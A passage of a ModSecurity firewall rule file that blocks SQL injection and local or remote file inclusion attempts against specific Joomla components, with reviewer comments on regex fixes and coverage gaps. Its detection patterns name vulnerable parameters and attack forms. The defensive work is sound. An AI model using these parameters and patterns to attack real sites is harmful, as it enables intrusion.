REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011022,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011023,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011024) SpiderLabs 
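Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UNION SELECT SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011024,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_blog&" "chain"
SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# Reading the chains in this section: the chain starter carries the phase,
# disruptive action, id/rev/msg/tag metadata and the t:... transformations;
# every following SecRule marked "chain" must also match, and the last rule
# of the chain raises tx.anomaly_score and records the matched variable.
# NOTE(review): the t:... list appears on the chain starter only; confirm
# which transformations the chained ARGS rules get from SecDefaultAction.
# NOTE(review): each chain requires "GET " in the request line, so the same
# parameter arriving in a request body is not covered; confirm this is
# intended or pair these rules with the generic attack rules.

# (2011025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter INSERT INTO SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011025,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_blog&" "chain"
SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2011026) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011026,rev:11,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_blog&" "chain"
SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2011017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt
# ARGS:mosConfig_absolute_path evaluates to the parameter VALUE only. The
# previous pattern required the literal text "mosConfig_absolute_path=" inside
# that value, so an ordinary name=value pair never satisfied the last rule of
# the chain. The pattern below still matches everything the old one did and
# additionally matches a value that starts (after optional whitespace) with
# http(s), ftp(s) or php followed by ":/".
SecRule REQUEST_LINE "@contains /components/com_jcalpro/cal_popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011017,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/joomlajcalpro-rfi.txt'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:mosConfig_absolute_path "(?i:(?:^|mosConfig_absolute_path\s*=)\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jcalpro cal_popup.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2011067) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /index.php"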
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011067,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_wgpicasa&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011077) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011077,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule ARGS:face_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011078) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011078,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla 
FaceBook Component face_id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule ARGS:face_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011079) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011079,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule ARGS:face_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011080) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011080,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 
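REQUEST_LINE "@contains option=com_gbufacebook&" "chain"
SecRule ARGS:face_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# Reading the chains in this section: the chain starter carries the phase,
# disruptive action, id/rev/msg/tag metadata and the t:... transformations;
# every following SecRule marked "chain" must also match, and the last rule
# of the chain raises tx.anomaly_score and records the matched variable.
# NOTE(review): the t:... list appears on the chain starter only; confirm
# which transformations the chained ARGS rules get from SecDefaultAction.
# NOTE(review): each chain requires "GET " in the request line, so the same
# parameter arriving in a request body is not covered; confirm this is
# intended or pair these rules with the generic attack rules.

# (2011081) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011081,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain"
SecRule ARGS:face_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# Remote-file-inclusion chains below (2011131, 2011132, 2009384, 2009391):
# ARGS:<name> evaluates to the parameter VALUE only. The previous patterns
# required the literal "<name>=" text inside that value, so an ordinary
# name=value pair never satisfied the last rule of the chain. Each pattern
# now still matches everything the old one did and additionally matches a
# value that starts (after optional whitespace) with ftp(s), http(s) or php
# followed by ":/".

# (2011131) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /administrator/components/com_jwmmxtd/admin.jwmmxtd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011131,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:mosConfig_absolute_path "(?i:(?:^|mosConfig_absolute_path=)\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jwmmxtd Component mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2011132) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion
SecRule REQUEST_LINE "@contains /administrator/components/com_universal/includes/config/config.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011132,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,38949'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:mosConfig_absolute_path "(?i:(?:^|mosConfig_absolute_path=)\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_universal Component Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion
# The last rule looks for the literal "../" in the parameter value.
SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009383,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:GLOBALS[mosConfig_absolute_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009384) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009384,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:GLOBALS[mosConfig_absolute_path] "(?i:(?:^|GLOBALS\[mosConfig_absolute_path\]=)\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2009391) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /com_ongumatimesheet20/lib/onguma.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009391,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6976/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:mosConfig_absolute_path "(?i:(?:^|mosConfig_absolute_path=)\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET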
WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011557) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011557,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011558) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011558,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component INSERT INTO SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011559,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011560) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011560,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component SELECT FROM SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011561) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011561,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011554) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011554,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jphone" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011385) SpiderLabs Research (SLR) Public Vulns: ET 
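WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011385,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_noticeboard" "chain"
SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# Reading the chains in this section: the chain starter carries the phase,
# disruptive action, id/rev/msg/tag metadata and the t:... transformations;
# every following SecRule marked "chain" must also match, and the last rule
# of the chain raises tx.anomaly_score and records the matched variable.
# NOTE(review): the t:... list appears on the chain starter only; confirm
# which transformations the chained ARGS rules get from SecDefaultAction.
# NOTE(review): each chain requires "GET " in the request line, so the same
# parameter arriving in a request body is not covered; confirm this is
# intended or pair these rules with the generic attack rules.

# (2011451) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt
# The last rule looks for the literal "../" in the controller parameter value.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011451,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_jgrid" "chain"
SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# Remote-file-inclusion chains below (2011844, 2011847, 2011935, 2011929):
# ARGS:<name> evaluates to the parameter VALUE only. The previous patterns
# required the literal "<name>=" text inside that value, so an ordinary
# name=value pair never satisfied the last rule of the chain. Each pattern
# now still matches everything the old one did and additionally matches a
# value that starts (after optional whitespace) with ftp(s), http(s) or php
# followed by ":/".

# (2011844) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /com_rwcards/rwcards.advancedate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011844,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
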